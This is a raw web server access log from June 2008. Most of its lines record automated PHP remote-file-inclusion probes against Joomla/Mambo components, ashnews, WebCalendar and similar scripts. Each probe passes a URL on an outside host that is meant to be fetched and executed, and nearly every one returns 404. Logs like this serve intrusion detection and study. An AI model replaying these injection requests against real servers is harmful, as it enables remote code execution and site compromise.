87.106.18.76 - - [22/Jun/2008:18:47:13 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:18:47:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:18:47:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:18:47:24 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:18:47:29 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.6.18.224 - - [22/Jun/2008:18:48:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
74.6.18.224 - - [22/Jun/2008:18:48:32 -0700] "GET /logs/access.log HTTP/1.0" 200 27675 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:18:49:38 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:18:49:38 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.195.37.175 - - [22/Jun/2008:18:50:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.37.175 - - [22/Jun/2008:18:50:27 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.37.175 - - [22/Jun/2008:18:52:14 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
80.86.92.124 - - [22/Jun/2008:18:54:07 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
80.86.92.124 - - [22/Jun/2008:18:54:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
80.86.92.124 - - [22/Jun/2008:18:54:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
87.106.178.42 - - [22/Jun/2008:18:54:22 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.178.42 - - [22/Jun/2008:18:54:22 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.178.42 - - [22/Jun/2008:18:54:22 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.25.142.64 - - [22/Jun/2008:18:54:25 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.25.142.64 - - [22/Jun/2008:18:54:25 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.25.142.64 - - [22/Jun/2008:18:54:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.110.54.240 - - [22/Jun/2008:18:54:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.110.54.240 - - [22/Jun/2008:18:54:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
59.188.5.164 - - [22/Jun/2008:18:54:35 -0700] "GET /logs/access_080211.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
59.188.5.164 - - [22/Jun/2008:18:54:35 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
59.188.5.164 - - [22/Jun/2008:18:54:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
88.84.143.195 - - [22/Jun/2008:18:54:39 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
88.84.143.195 - - [22/Jun/2008:18:54:39 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
88.84.143.195 - - [22/Jun/2008:18:54:40 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.92.124 - - [22/Jun/2008:18:55:25 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
87.106.178.42 - - [22/Jun/2008:18:55:27 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.25.142.64 - - [22/Jun/2008:18:55:53 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
88.84.143.195 - - [22/Jun/2008:18:55:57 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:18:57:55 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:18:57:55 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:18:57:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.101.24 - - [22/Jun/2008:19:03:49 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.101.24 - - [22/Jun/2008:19:03:50 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.218.234.146 - - [22/Jun/2008:19:06:58 -0700] "GET /logs/middle.php?page=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
207.218.234.146 - - [22/Jun/2008:19:06:58 -0700] "GET /middle.php?page=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:07:30 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:07:30 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:09:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:09:14 -0700] "GET //ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:09:23 -0700] "GET //ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:09:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
207.218.234.146 - - [22/Jun/2008:19:09:45 -0700] "GET /logs/start.php?s=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
207.218.234.146 - - [22/Jun/2008:19:09:45 -0700] "GET /start.php?s=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:12:13 -0700] "GET //?mosConfig_absolute_path=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:19:12:13 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 200 3946 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:19:12:46 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:07 -0700] "GET /logs/access_080211.log/index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:08 -0700] "GET /logs/access_080211.log/index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:13 -0700] "GET /index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:18 -0700] "GET /index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:24 -0700] "GET /logs/index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:19:14:29 -0700] "GET /logs/index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:19:18:54 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:19:21 -0700] "GET /logs/access_071217.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:19:21 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:19:21 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:20:24 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:19:21:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:19:21:25 -0700] "GET //ashnews.php?pathtoashnews=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:21:44 -0700] "GET /logs/access_071112.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:24:06 -0700] "GET /logs/access.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:24:06 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:24:06 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.7.108.203 - - [22/Jun/2008:19:26:53 -0700] "GET /logs//Commence/reviewer/includes/include_all_fns.php?php_root_path=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.7.108.203 - - [22/Jun/2008:19:26:53 -0700] "GET //Commence/reviewer/includes/include_all_fns.php?php_root_path=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.101.24 - - [22/Jun/2008:19:31:52 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.101.24 - - [22/Jun/2008:19:31:53 -0700] "GET //ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:24 -0700] "GET /logs/access.log//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:24 -0700] "GET /logs/access.log//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:25 -0700] "GET //events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:25 -0700] "GET //WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:25 -0700] "GET /logs//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:33:25 -0700] "GET /logs//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:35:20 -0700] "GET /logs//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:35:21 -0700] "GET //WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:36:10 -0700] "GET /logs/access_080211.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:36:10 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
72.3.224.31 - - [22/Jun/2008:19:36:10 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:36:32 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:36:32 -0700] "GET /?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:36:32 -0700] "GET /logs/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 3941 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:39:01 -0700] "GET /logs/access.log//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:39:02 -0700] "GET //cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:39:02 -0700] "GET /logs//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:19:39:23 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:19:39:23 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:39:40 -0700] "GET /logs//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:39:40 -0700] "GET //events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:19:40:39 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:19:40:40 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:40:47 -0700] "GET /logs/access_080211.log/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:40:48 -0700] "GET /?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:19:40:48 -0700] "GET /logs/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 3941 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:37 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:37 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:44 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:45 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:49 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:19:41:49 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:44:45 -0700] "GET /logs/access_071217.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
